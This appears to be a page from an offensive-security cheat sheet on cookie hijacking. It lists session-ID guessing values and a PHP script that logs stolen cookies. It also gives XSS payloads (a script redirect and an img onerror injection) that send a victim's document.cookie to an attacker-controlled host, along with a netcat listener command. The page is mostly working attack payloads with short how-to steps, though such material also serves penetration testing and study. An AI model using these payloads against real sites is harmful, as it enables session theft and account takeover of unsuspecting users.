Cookie Hijacking

A methodology of manipulating, grabbing cookies.

Cookie: PHPSESSID=0
Cookie: PHPSESSID=1
Cookie: PHPSESSID=999

<!-- ASCII Hex -->
Cookie: PHPSESSID=3836382d61646d696e

In your local machine, create the payload for grabbing the cookie when the other user will access your machine.

// steal_cookie.php

<?php echo $_GET['cookie']; ?>

Create the JavaScript code to force users to access your machine which shows the victim's cookie value.

<script>document.location = 'http://<attacker-ip>:4444/steal_cookie.php?cookie='+document.cookie</script>

POST request with this JavaScript code to the target web page. Open listner in your local machine and wait for the other users will access the target web page.

nc -lvnp 4444

This script is useful to steal Cookie. To start web server, execute the Python script as below.

python2 XSS-cookie-stealer.py

Then inject our XSS to steal Cookie via our web server. For instance,

<img src=x onerror=this.src='http://10.0.0.1:8888/?'+document.cookie;>

PreviousCode Deobfuscation NextDOM Cloberring

Last updated 1 month ago

hashtagCookie Manipulation

hashtagPHP Cookie Grabbing with XSS

hashtagPython Cookie Stealer with XSS

Cookie Manipulation

PHP Cookie Grabbing with XSS

Python Cookie Stealer with XSS